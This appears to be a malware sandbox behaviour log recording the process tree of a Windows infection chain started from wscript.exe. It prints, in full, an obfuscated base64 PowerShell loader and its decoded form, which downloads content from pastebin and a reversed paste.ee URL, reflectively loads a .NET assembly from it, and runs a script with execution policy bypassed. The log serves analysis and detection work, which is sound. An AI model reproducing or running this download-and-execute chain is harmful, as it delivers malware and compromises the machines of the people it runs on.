parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★M★★v★Dc★Rw★y★F★★eQBG★Es★V★★v★GQ★LwBl★GU★LgBl★HQ★cwBh★H★★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
parent_process wscript.exe martian_process powershell.exe $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★M★★v★Dc★Rw★y★F★★eQBG★Es★V★★v★GQ★LwBl★GU★LgBl★HQ★cwBh★H★★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\dll03.ps1
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/7G2PyFKT/d/ee.etsap//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe